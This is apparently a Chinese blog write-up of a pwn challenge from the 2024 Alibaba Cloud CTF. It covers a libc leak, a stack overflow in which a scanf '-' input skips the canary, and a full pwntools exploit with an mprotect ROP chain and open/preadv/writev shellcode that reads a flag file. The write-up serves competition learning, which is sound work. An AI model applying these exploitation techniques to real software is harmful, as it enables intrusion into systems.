阿里云2024 CTF pwn 签到题

最新推荐文章于 2024-04-15 03:36:37 发布
最新推荐文章于 2024-04-15 03:36:37 发布
阅读量1.1k 收藏 24
点赞数 30
文章标签: 学习 笔记 网络安全 阿里云
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74220442/article/details/137079798
版权
文章讲述了参与者在阿里云比赛中解决一道逆向工程题目,涉及静态分析、栈溢出漏洞发现、canary绕过以及ROP链的构造过程,展示了如何通过给数组赋值、泄露地址和执行恶意代码来完成挑战。
摘要由CSDN通过智能技术生成

先小小感慨一下 不愧是阿里云的比赛,签到题都做的我汗流浃背,这题让我明白自己离pwn佬还有非常远的距离要走,吾辈真的还须努力!!!!!

准备阶段


保护全开!!! 坐起来和它打 md

静态分析

SUB_12C9

看到这种就知道了 淦 开了沙盒 要用orw去读取flag了

sub_14D7

看上去很吓人,但其实 就相当于dowrd_6080为起点 来搭建一个数组 通过这个函数去给每个数组赋初值,这里应该是作者构建好的,我们无法去控制这个函数的地方,所以只要知道是赋值就行

start

这里就是主界面了 通过read的值跳到sub_19D6() 和 sub_2F1D

sub_19D6

这里sub_13F0 我们进去看看 发现就是一个读取size的函数,然后看一下sub_1445 就是一个检查和过滤没啥用,注意下这里定了ptr,然后我们跳转到

这里是第二个关键数组dword_66E0 和前面的dowrd_6080,这里也是以这个为起点搭建一个数组,这个sub_13F0 就是给这个数组读取值,而这个值是我们可以输入的!!!!然后我们输入完这里就基本结束了,然后看一下下一个函数

骚操作

因为我不是很懂ida 在调试的时候都是把地址写下来通过偏移把数组搭建好的,然后这时候我旁边那个逆向大佬看不下去了,就教我一个ida的操作

右键初始地址 点击array

sub_2F1D()

这里可以看到 我们就是通过给数组的值来绕过各种if检查来到有漏洞的函数

漏洞函数

这里就可以泄露地址了 会把ptr的地址指向的位置打印出来,这就是泄露地址的位置

那地址都已经泄露了 假设我们可以通过这个泄露的地址得到libc地址,那么我们要如何进行攻击呢?于是我们继续进行代码审计

发现有很多这样结构的函数 而v3是在栈上的地址,这里循环条件是v2 而v2是开始读取进入的字节数,也就是说0x20是不够溢出的,但是这个思路是可以溢出的,也就是说我们只要找到一个读取字节数比较大的就可以了

于是我们通过跟踪read函数找到了这个

这就足够我们栈溢出了 那么canary要怎么办呢??? 这也是困扰了我挺久的问题,重点来了!!!

canary的绕过

由于是__isoc99_scanf("%d", &v3[4 * i]); 进行的读取 导致的栈溢出

那么我能不能在保证不影响canary的情况下直接跳过去到rbp呢,我开始想的是发送换行符,但不行 会直接默认作废然后发送原本应该下一次的内容到这一次,不能直接跳过。我通过去查找资料发现

因此,当您发送减号 - 后,scanf 会将其识别为负数的开始,并会继续等待输入数字,直到达到非数字字符,换行符,或者文件结束。在这个例子中,您发送的只是一个 -,然后紧接着一个换行符(因为 sendline 函数会发送换行符),scanf 函数会在遇到换行符之后停止读取,并且由于没有读取到任何数字,它将无法成功将任何值存储到 v3[4 * i]

也就是说它已经接收到了东西而不是没接收到 就说明已经开始了这个函数的执行,但是因为函数的性质会导致没有读入东西,因此我们可以通过这样的方式绕过canay。哇靠 出题人真的厉害 ,

因此我们绕过canary 就可以开始进行rop的构造了

静态分析总结

定义了两个数组,通过给第二个数组赋值来绕过各种判断语句 到达漏洞函数,通过第一个漏洞函数泄露libc地址,通过第二个漏洞函数 进行栈溢出并且能够绕过canary 执行rop链

动态调试

可以看到ptr基本没怎么变过

先动态调试确认下我们泄露的ptr指向的地址是什么东西

0x55555555b2a0 这是ptr的地址

可以看到 ptr指向的位置是main_arena 的地址 我干 但是我们要传入参数,就是往堆里面放一些数据,但为了不破防地址 我们就传入一个a也就是61 就把偏移变一下 不影响我们解题

这里就是这样,然后我们到puts函数那个位置看一下 是不是泄露的和这个一样,中间绕的那部分再静态分析中讲清楚了这里就不多说了,我直接给出数组

N = [0,4, 0, 4, 0, 0, 0, 0, 0, 0, 1, 0, 4, 8, 4]

可以看到和我们调试的一样(我前面是直接动调的,这里是拿我写好后的exp调的 地址会变 但没影响)

泄露成功 然后 我们就直接到栈溢出的函数 进行栈溢出就行了,这里给大家调试看下canary的绕过

没溢出前


溢出后

可以看到这个方法是可以绕过canary的

然后我们构造rop链,由于溢出长度不够 我们先把shellcode读入再去执行 orw链 就结束了

exp

#!/usr/bin/python3
from pwn import *

file = "./qiandao"
mx = process(file)
elf = ELF(file)
libc = elf.libc
context.log_level = "debug"
context.arch = 'amd64'  # 设置为64位架构


# -----------------------------------------------------------
def add1(size, content):
    N = [0, 0, 4, 0, 4, 0, 0, 0, 0, 0, 0, 1, 0, 4, 8, 4]
    mx.recvuntil("hhh\n")
    mx.sendline("1")
    mx.recvuntil("size???\n")
    mx.sendline(str(size))
    mx.sendline(content)
    mx.recvuntil("Lucky Numbers\n")
    for i in N:
        mx.sendline(str(i))


def add2(size, content):
    N2 = [0, 4, 4, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 4]
    mx.recvuntil("hhh\n")
    mx.sendline("1")
    mx.recvuntil("size???\n")
    mx.sendline(str(size))
    mx.sendline(content)
    mx.recvuntil("Lucky Numbers\n")
    for i in N2:
        mx.sendline(str(i))


def dbg():
    gdb.attach(mx)


dbg()
add1(0x10, b'a')
mx.sendline("2")
mx.recvuntil("\n")
libc_addr = u64(mx.recv(6).ljust(8, b'\x00')) - 0x1249 - 0x1d2f18
log.success("libc_addr--->" + hex(libc_addr))

add2(0x10, b'a')
mx.sendline("2")
mx.sendafter(b'xmki', b'a' * 0x200)

# pause()
for i in range(0x42):
    pl = str(0x62626262)
    mx.sendline(pl)
mx.sendline("-")
mx.sendline("-")
mx.sendline(str(0x62626262))
mx.sendline(str(0x62626262))

mprotect = libc.sym['mprotect']
read64 = libc.sym['read']
open64 = libc.sym['open']
write64 = libc.sym['write']
addr = libc.sym['__malloc_hook'] & ~0xfff
pop_rdi = libc.address + 0x0000000000027c65
pop_rsi = libc.address + 0x0000000000029419
pop_rdx_rbx = libc.address + 0x000000000084565

rop = p64(pop_rdi) + p64(addr)
rop += p64(pop_rsi) + p64(0x1000)
rop += p64(pop_rdx_rbx) + p64(7) + p64(0) + p64(mprotect)
rop += p64(pop_rdi) + p64(0)
rop += p64(pop_rsi) + p64(addr)
rop += p64(pop_rdx_rbx) + p64(0x600) + p64(0)
rop += p64(read64) + p64(addr)

for i in range(0, len(rop), 4):
    n = u32(rop[i:i + 4])
    mx.sendline(str(n))

for _ in range(0x200 - 0x42 - 4 - (len(rop) // 4)):
    mx.sendline(str(0x62626262))

sh = shellcraft.open('./flag.txt')
#  shellcraft.read(3,addr+0x300,0x400) +\
#  shellcraft.write(1,addr+0x300,0x100)

sh += \
    '''
        mov rdi, 3
        push 0x100
        lea rbx, [rsp-8]
        push rbx
        mov rsi, rsp
        mov rdx, 1
        xor r10, r10
        xor r8, r8
        push SYS_preadv
        pop rax
        syscall

        push 1
        pop rdi
        push 0x1
        pop rdx
        push 0x100
        lea rbx, [rsp+8]
        push rbx
        mov rsi, rsp
        push SYS_writev
        pop rax
        syscall

    '''
shellcode = asm(sh)
mx.send(shellcode)
mx.interactive()

参考来源 :2024阿里CTF WriteUp By Mini-Venom (qq.com)

慕雪岑
关注
  • 30
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTF PWN 武器库
12-12
"CTF PWN 武器库"通常指的是这类竞赛中的一个问,挑战者需要利用编程技巧来解决安全漏洞,获取系统的控制权。在这个特定的案例中,我们面对的目是"rifle",它涉及到fastbin堆溢出,这是一种常见的内存管理漏洞...
ctfctf-pwn收集
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
ctfshow 内部赛 pwn 签到
SCP000111的博客
11-16 1610
ctfshow 内部赛 pwn 签到 找了在刷的中,不会做这道,找了好久没找到wp,搞了几天,还怀疑目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的目似乎与这道一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
ctfshow pwn——PWN签到pwn02
qq_55233040的博客
01-24 5000
PWNPWN签到pwn02 PWN签到 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
CTF_WP-攻防世界web解,Alibaba高并发业务实战文档
最新发布
2301_82242296的博客
04-15 642
目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
2018护网杯的pwn签到(详细过程)
dengshanyi7201的博客
10-14 605
目: 链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA 提取码:z5a7 首先找保护机制 难受 保护全开!! 运行一下,发现只有一个输入点。 ida分析一波 发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了...
[XYCTF新生赛]-PWN:hello_world(签到)解析(泄露libc_start_call_main获取libc地址)
2301_79326813的博客
04-04 220
查看保护查看ida这里的printf没有格式化字符串漏洞,但是我们依旧可以填充栈来利用printf泄露栈上信息根据我们能填充的字节数来看,我们无法泄露出libc_start_main+128的地址,但是可以泄露libc_start_call_main+128的地址,利用加上或减去相对libc_start_main的偏移依旧可以得出libc_start_main的地址,实现ret2libc。
CTFshow】——PWN签到
IronmanJay的博客
08-15 881
PWN签到-nc pwn.challenge.ctf.show 28171
阿里云ctf比赛writeup
04-26
阿里云CTF比赛提供了多种类型的挑战,包括Web、Misc、Pwn、Reverse和Crypto,这涵盖了网络安全的多个重要方面。以下是对这些挑战的详细分析: 1. Web: - **bypassIt I & II**:这些挑战涉及到Web应用程序的安全...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习 可用于练习基础的ROP
南邮CTF--------签到1
weixin_46204746的博客
02-10 2533
南邮CTF--------签到 1.签到(chinalover.sinaapp.com/web1/) 直接右键查看源码 flag is:nctf{flag_admiaanaaaaaaaaaaa} 2.签到2 (teamxlc.sinaapp.com/web1/02298884f0724c04293b4d8c0178615e/index.php) 打开页面,...
CTFweb篇——签到
热门推荐
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
新手打pwn
m0_74736832的博客
07-05 951
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
CTF签到
m0_67935111的博客
05-08 1709
提示输入口令zhimakaimen,但是查看源代码发现输入框对长度有限制,最长只能输入10位,使用firefox插件firebug,chrome控制台可直接对manlength值进行修改,改为大于11,即可输入;也可以使用burpsuite进行抓包,直接修改post值即可得到flag! flag is:nctf{follow_me_to_exploit} ...
FSCTF 2023 PWN
Xzzzz911的博客
10-26 669
FSCTF新生赛是由中国民航大学、天津理工大学、滁州学院、吉林师范大学、三明学院(排名不分先后)等5所高校共同举办的CTF新生赛,比赛涵盖Web、Pwn、Reverse、Crypto、Misc等赛方向。通过此次比赛,希望能够提高参赛师傅们的实践能力,促进进一步学习竞赛知识的热情,并为大家提供一个展示自我、交流合作的平台。完结撒花!!!
MoeCTF 2023 PWN
Xzzzz911的博客
10-14 612
MoeCTF 是西安电子科技大学一年一度的信息安全新生夺旗赛, 由西电信息安全协会 (XDSEC) 面向全体准大学生举办。完结撒花!!!
CTFSHOW 签到
MrTreebook的博客
12-05 1052
CTFSHOW 萌新赛 签到1.目下载地址2. checksec检查保护3.IDA分析4.构造ROP链4.exp 1.目下载地址 点击下载目 2. checksec检查保护 堆不可执行 3.IDA分析 看到了gets()函数,很明显存在溢出 需要知道64位系统和32位系统的区别 64 位系统传参从第一个到第六个依次保存在rdi,rsi,rdx,rcx,r8,r9 从第7个参数开始,接下来的所有参数都才通过栈传递 4.构造ROP链 我们需要找到合适的 gadgets,利用 ROPgadget a
CTF比赛中常见的MISC解方法
EaSoNgo111的博客
05-09 2579
可以看到1.png这个图片的文件头,那我们现在需要寻找文件尾,按ctrl+f,查找文件尾AE 42 60 82,如果图片里隐藏了数据,那么文件尾后就会藏有文件:大多数时候都是pk开头的文本格式,这就是压缩包,所以把这个图片扔到binwalk或者foremost里分离一下(嫌麻烦的可以直接将这个1.png文件改后缀),如果是隐藏了zip,直接将1.png改名为1.zip。(一)鼠标右键查看属性,最简单的目是属性里备注给出了flag或者各种编码(编码解法在最上面我说过的)文件尾,50 4B.
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统控制权。 CTF 简单 PWN 目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 目,从初学者到专业选手都能找到适合自己水平的目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值